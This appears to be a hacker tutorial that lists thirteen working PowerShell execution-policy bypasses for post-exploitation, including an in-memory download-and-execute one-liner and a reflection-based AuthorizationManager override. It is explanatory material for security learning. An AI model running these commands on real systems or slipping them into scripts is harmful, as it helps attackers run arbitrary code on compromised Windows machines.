How To: Bypass PowerShell Execution Policy to Pwn Windows

PowerShell is an essential component of any Windows environment and can be a powerful tool in the hands of a hacker. During post-exploitation, PowerShell scripts can make privilege escalation and pivoting a breeze, but its execution policy can put a damper on even the best-laid plans. There are a variety of methods, however, that can be used to bypass PowerShell execution policy.

PowerShell Execution Policy Overview

The purpose of PowerShell's execution policy is to control how configuration files are loaded and how scripts are run. It's a safety feature that helps prevent malicious scripts from being executed. Policies can be set at the computer level, user level, and session level on Windows machines. It's important to note that the execution policy is not meant to be secure — it merely prevents users from unintentionally causing damage. As we'll soon find out, it can be bypassed in several ways.

There are seven types of execution policies in PowerShell. These are only enforced on Windows machines:

• Unrestricted: This is the default policy for non-Windows machines; it means scripts will be run with a warning.
• Restricted: This is the default for Windows machines; it prevents scripts from being run but allows individual commands.
• Bypass: This means all scripts can run and there are no warnings.
• AllSigned: This requires all scripts and configuration files to be signed by a trusted publisher — even those created on the local machine.
• RemoteSigned: This is the default policy on Windows servers; requires a signature only from files downloaded from the internet.
• Default: This simply sets the default execution policy.
• Undefined: This is when there is no policy set in the current scope. If all scopes are Undefined, the execution policy defaults to Restricted.

To view the current execution policy, issue the following command in PowerShell:

Get-ExecutionPolicy

Now that we've covered the basics, let's get started on some bypasses.

Method 1: Bypass Flag

Perhaps the easiest way to bypass execution policy is to use the Bypass flag. Doing so will run the script with no warnings or prompts.

PowerShell.exe -ExecutionPolicy Bypass -File .\script.ps1

Method 2: Unrestricted Flag

Similar to the Bypass flag, we can use the Unrestricted flag to run our script, this time with a warning.

PowerShell.exe -ExecutionPolicy Unrestricted -File .\script.ps1

Method 3: Command Switch

We can use the command switch to issue commands and directly run a script. This will work for simple scripts, but more complex ones will usually have errors.

PowerShell -command "Write-Host 'This is a test.'"

Or the short version:

PowerShell -c "Write-Host 'This is a test.'"

Method 4: Encoded Command Switch

This method is similar to the command switch but encodes the script as a base64 encoded string. This can help avoid parsing errors as well as provide a layer of obfuscation.

$command = "Write-Host 'This is a test.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

Method 5: Invoke-Command

The Invoke-Command method is nice in that it can be used to issue commands against remote machines when PowerShell remoting has been enabled.

invoke-command -scriptblock {Write-Host "This is a test."}

Method 6: Invoke-Expression

We can use the Invoke-Expression method to pipe the contents of our script and be executed.

Get-Content .\script.ps1 | Invoke-Expression

Or the short version:

GC .\script.ps1 | iex

Method 7: Download from URL

PowerShell can be used to download a script from the internet, or from an attacker's machine, and then be executed without writing to disk.

PowerShell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')"

Method 8: Paste

Another method to get around execution policy is to simply copy and paste the script into the interactive console. Again, this is useful for running quick scripts that aren't too complex.

Write-Host "This is a test."

Method 9: Echo & Pipe

We can also echo the contents of our script into PowerShell standard input.

Echo Write-Host "This is a test." | PowerShell -noprofile -

Method 10: Read & Pipe

Similar to the echo method, we can read the contents of our script and pipe it into PowerShell standard input.

Get-Content .\script.ps1 | PowerShell -noprofile -

Or using the Windows type command:

type .\script.ps1 | PowerShell -noprofile -

Method 11: Process Scope

The execution policy can be applied at different levels, including the currently controlled process. We can change the execution policy for the current process.

Set-ExecutionPolicy Bypass -Scope Process

Method 12: Current User Scope

This method is similar to the process scope but changes the execution policy for the current user. This works by modifying a registry key under the hood.

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted

Method 13: Authorization Manager Swap

The final method we'll cover essentially overrides a function in PowerShell. The AuthorizationManager function will be replaced with a null value when our function is called, setting the execution policy for the session to Unrestricted, and allowing our script to run.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy .\script.ps1

PowerShell Is an Essential Tool for Any Hacker

In this article, we learned about PowerShell's execution policy, the modes it has, and the differences between them. We then explored a variety of methods to bypass execution policy to run scripts. PowerShell is an essential tool for any hacker, especially during post-exploitation, and the ability to execute scripts unrestricted makes things a whole lot easier.